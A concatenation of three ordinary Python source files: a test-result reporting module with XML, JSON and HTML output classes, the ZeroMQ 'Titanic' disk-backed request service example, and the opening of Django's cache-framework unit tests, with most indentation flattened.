        '''Handle the end of a test step
        :param passed: whether the test step passed
        :type passed: boolean
        '''
self._stepnode.setAttribute('result', str(passed))
def handle_log_record(self, level, msg, record, attachments):
        '''Handle a log record
        :param level: log level, see EnumLogLevel
        :type level: string
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
        '''
if not isinstance(msg, six.string_types):
msg = str(msg)
        # The current report system only supports tags for some log levels, so map the level first
if level >= EnumLogLevel.ERROR:
tagname = levelname[EnumLogLevel.ERROR]
elif level == EnumLogLevel.Environment or level == EnumLogLevel.RESOURCE:
tagname = levelname[EnumLogLevel.INFO]
else:
tagname = levelname[level]
infonode = self._xmldoc.createElement(tagname)
textnode = self._xmldoc.createTextNode(smart_text(msg))
infonode.appendChild(textnode)
self._stepnode.appendChild(infonode)
if level == EnumLogLevel.ASSERT:
if "actual" in record:
node = self._xmldoc.createElement("ACTUAL")
try:
actual = record["actual"]
if isinstance(actual, six.string_types):
actual = smart_text(actual)
dom.parseString("<a>%s</a>" % actual)
acttxt = "%s%s" % (actual.__class__, actual)
except xmlexpat.ExpatError:
acttxt = "%s%s" % (actual.__class__, repr(actual))
except UnicodeEncodeError:
acttxt = "%s%s" % (actual.__class__, repr(actual))
node.appendChild(self._xmldoc.createTextNode(acttxt))
infonode.appendChild(node)
if "expect" in record:
node = self._xmldoc.createElement("EXPECT")
try:
expect = record["expect"]
if isinstance(expect, six.string_types):
expect = smart_text(expect)
dom.parseString("<a>%s</a>" % expect)
exptxt = "%s%s" % (expect.__class__, expect)
except xmlexpat.ExpatError:
exptxt = "%s%s" % (expect.__class__, repr(expect))
except UnicodeEncodeError:
exptxt = "%s%s" % (expect.__class__, repr(expect))
node.appendChild(self._xmldoc.createTextNode(exptxt))
infonode.appendChild(node)
if "traceback" in record:
excnode = self._xmldoc.createElement('EXCEPT')
excnode.appendChild(self._xmldoc.createTextNode(smart_text(record["traceback"])))
infonode.appendChild(excnode)
for name in attachments:
file_path = attachments[name]
attnode = self._xmldoc.createElement('ATTACHMENT')
attnode.setAttribute('filepath', smart_text(file_path))
attnode.appendChild(self._xmldoc.createTextNode(smart_text(name)))
infonode.appendChild(attnode)
def toxml(self):
        '''Return the XML text
        :returns: string - XML text
        '''
return to_pretty_xml(self._xmldoc)
class JSONResult(TestResultBase):
    '''Test result in JSON format
    '''
def __init__(self, testcase):
super(JSONResult, self).__init__()
self._steps = []
self._data = {
"testcase": testcase.test_name,
"steps": self._steps,
"failed_info": "",
}
self._translated_name = translate_bad_char(testcase.test_name)
def get_data(self):
return self._data
def get_file(self):
file_name = '%s_%s.json' % (self._translated_name, get_time_str())
if not path_exists(file_name):
content = json.dumps(self._data)
with codecs_open(file_name, mode="w", encoding="utf-8") as fd:
fd.write(content)
return file_name
def handle_test_begin(self, testcase):
        '''Handle the beginning of a test case execution
        :param testcase: test case
        :type testcase: TestCase
        '''
        self.begin_step("Test case initialization step")
def handle_test_end(self, passed):
        '''Handle the end of a test case execution
        :param passed: whether the test case passed
        :type passed: boolean
        '''
self._data["succeed"] = passed
self._data["start_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))
self._data["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time))
self._data["failed_info"] = self.failed_info
def handle_step_begin(self, msg):
        '''Handle the beginning of a test step
        :param msg: name of the test step
        :type msg: string
        '''
self._steps.append({
"name": msg,
"start_time": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"logs": []
})
def handle_step_end(self, passed):
        '''Handle the end of a test step
        :param passed: whether the test step passed
        :type passed: boolean
        '''
curr_step = self._steps[-1]
curr_step["succeed"] = passed
curr_step["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
def handle_log_record(self, level, msg, record, attachments):
        '''Handle a log record
        :param level: log level, see EnumLogLevel
        :type level: string
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
        '''
curr_step = self._steps[-1]
curr_step["logs"].append({
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"level": level,
"message": msg,
"record": record,
"attachments": attachments
})
class HtmlResult(JSONResult):
"""html test result
"""
def get_file(self):
file_name = '%s_%s.js' % (self._translated_name, get_time_str())
if not path_exists(file_name):
            var_name = os.path.basename(file_name)
            var_name = os.path.splitext(var_name)[0].replace(".", "_")
content = "var %s = %s" % (var_name, json.dumps(self._data))
content = smart_binary(content)
with codecs_open(file_name, mode="wb") as fd:
fd.write(content)
return file_name
class TestResultCollection(list):
    '''Collection of test results
    '''
def __init__(self, results, passed):
        '''Constructor
        :param results: list of test results
        :type results: list
        :param passed: whether the tests passed
        :type passed: boolean
        '''
super(TestResultCollection, self).__init__(results)
self.__passed = passed
@property
def passed(self):
        '''whether the tests passed
        :returns: boolean
        '''
return self.__passed
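# --- Illustrative usage sketch (an assumption, not part of the original module) ---
# Shows how the per-format result objects defined above might be grouped for a
# single test case. ``_DemoCase`` is a hypothetical stand-in exposing only the
# ``test_name`` attribute that the constructors above rely on.
if __name__ == "__main__":  # demonstration only
    class _DemoCase(object):
        test_name = "demo.DemoTest"

    _demo_case = _DemoCase()
    _collection = TestResultCollection(
        [JSONResult(_demo_case), HtmlResult(_demo_case)], passed=True)
    print(_collection.passed)  # True
    print(len(_collection))    # 2 -- behaves like a plain list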
|
titanic.py
|
"""
Titanic service
Implements server side of http://rfc.zeromq.org/spec:9
Author: Min RK <benjaminrk@gmail.com>
"""
import cPickle as pickle
import os
import sys
import threading
import time
from uuid import uuid4
import zmq
from mdwrkapi import MajorDomoWorker
from mdcliapi import MajorDomoClient
from zhelpers import zpipe
TITANIC_DIR = ".titanic"
def request_filename (uuid):
"""Returns freshly allocated request filename for given UUID"""
return os.path.join(TITANIC_DIR, "%s.req" % uuid)
#
def reply_filename (uuid):
"""Returns freshly allocated reply filename for given UUID"""
return os.path.join(TITANIC_DIR, "%s.rep" % uuid)
# ---------------------------------------------------------------------
# Titanic request service
def titanic_request (pipe):
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.request")
reply = None
while True:
# Send reply if it's not null
# And then get next request from broker
request = worker.recv(reply)
if not request:
break # Interrupted, exit
# Ensure message directory exists
if not os.path.exists(TITANIC_DIR):
os.mkdir(TITANIC_DIR)
# Generate UUID and save message to disk
uuid = uuid4().hex
filename = request_filename (uuid)
with open(filename, 'w') as f:
pickle.dump(request, f)
# Send UUID through to message queue
pipe.send(uuid)
# Now send UUID back to client
# Done by the worker.recv() at the top of the loop
reply = ["200", uuid]
# ---------------------------------------------------------------------
# Titanic reply service
def titanic_reply ():
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.reply")
reply = None
while True:
request = worker.recv(reply)
if not request:
break # Interrupted, exit
uuid = request.pop(0)
req_filename = request_filename(uuid)
rep_filename = reply_filename(uuid)
if os.path.exists(rep_filename):
with open(rep_filename, 'r') as f:
reply = pickle.load(f)
reply = ["200"] + reply
else:
if os.path.exists(req_filename):
reply = ["300"] # pending
else:
reply = ["400"] # unknown
# ---------------------------------------------------------------------
# Titanic close service
def titanic_close():
worker = MajorDomoWorker("tcp://localhost:5555", "titanic.close")
reply = None
while True:
request = worker.recv(reply)
if not request:
break # Interrupted, exit
uuid = request.pop(0)
req_filename = request_filename(uuid)
rep_filename = reply_filename(uuid)
# should these be protected? Does zfile_delete ignore files
# that have already been removed? That's what we are doing here.
if os.path.exists(req_filename):
os.remove(req_filename)
if os.path.exists(rep_filename):
os.remove(rep_filename)
reply = ["200"]
def service_success(client, uuid):
"""Attempt to process a single request, return True if successful"""
# Load request message, service will be first frame
filename = request_filename (uuid)
# If the client already closed request, treat as successful
if not os.path.exists(filename):
return True
with open(filename, 'r') as f:
request = pickle.load(f)
service = request.pop(0)
# Use MMI protocol to check if service is available
mmi_request = [service]
mmi_reply = client.send("mmi.service", mmi_request)
service_ok = mmi_reply and mmi_reply[0] == "200"
if service_ok:
reply = client.send(service, request)
if reply:
filename = reply_filename (uuid)
with open(filename, "w") as f:
pickle.dump(reply, f)
return True
return False
def main():
verbose = '-v' in sys.argv
ctx = zmq.Context()
# Create MDP client session with short timeout
client = MajorDomoClient("tcp://localhost:5555", verbose)
client.timeout = 1000 # 1 sec
client.retries = 1 # only 1 retry
request_pipe, peer = zpipe(ctx)
request_thread = threading.Thread(target=titanic_request, args=(peer,))
request_thread.daemon = True
request_thread.start()
reply_thread = threading.Thread(target=titanic_reply)
reply_thread.daemon = True
reply_thread.start()
close_thread = threading.Thread(target=titanic_close)
close_thread.daemon = True
close_thread.start()
poller = zmq.Poller()
poller.register(request_pipe, zmq.POLLIN)
# Main dispatcher loop
while True:
# Ensure message directory exists
if not os.path.exists(TITANIC_DIR):
os.mkdir(TITANIC_DIR)
# We'll dispatch once per second, if there's no activity
try:
items = poller.poll(1000)
except KeyboardInterrupt:
            break  # Interrupted
if items:
# Append UUID to queue, prefixed with '-' for pending
uuid = request_pipe.recv()
with open(os.path.join(TITANIC_DIR, 'queue'), 'a') as f:
f.write("-%s\n" % uuid)
# Brute-force dispatcher
#
with open(os.path.join(TITANIC_DIR, 'queue'), 'r+b') as f:
for entry in f.readlines():
# UUID is prefixed with '-' if still waiting
if entry[0] == '-':
uuid = entry[1:].rstrip() # rstrip '\n' etc.
print "I: processing request %s" % uuid
if service_success(client, uuid):
# mark queue entry as processed
here = f.tell()
f.seek(-1*len(entry), os.SEEK_CUR)
f.write('+')
f.seek(here, os.SEEK_SET)
if __name__ == '__main__':
main()
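# --- Illustrative sketch (an assumption, not part of the original example) ---
# A standalone variant of the dispatcher's queue-file bookkeeping above:
# pending entries start with '-', and a handled entry is marked in place by
# seeking back to the start of its line and overwriting the prefix with '+'.
# Unlike the loop above, this version records each line's offset before
# reading it. ``uuid_to_mark`` is expected as a byte string.
def _mark_queue_entry_done(queue_path, uuid_to_mark):
    """Flip the '-' prefix of ``uuid_to_mark`` to '+' in the queue file."""
    with open(queue_path, 'r+b') as f:
        while True:
            pos = f.tell()               # offset of the line about to be read
            line = f.readline()
            if not line:
                break                    # end of the queue file
            if line[:1] == b'-' and line[1:].rstrip() == uuid_to_mark:
                f.seek(pos)              # jump back to this line's '-' prefix
                f.write(b'+')            # mark the entry as processed
                f.seek(pos + len(line))  # resume scanning after this line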
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango41Warning
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
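# Illustrative example (not part of the original tests):
# custom_key_func('answer', 'myprefix', 1) returns 'CUSTOM-myprefix-1-answer'.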
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
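# Illustrative example (an assumption, not part of the original tests): with
# base={'BACKEND': 'x'} and TIMEOUT=None, the resulting 'v2' entry is
# {'BACKEND': 'x', 'VERSION': 2, 'TIMEOUT': None} -- i.e. ``params`` override
# ``_caches_setting_base``, which in turn overrides ``base``.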
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# RemovedInDjango41Warning: python-memcached doesn't support .get() with
# default.
supports_get_with_default = True
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(
cache.has_key('null'),
True if self.supports_get_with_default else False,
)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
if self.supports_get_with_default:
self.assertIn('null', cache)
else:
self.assertNotIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
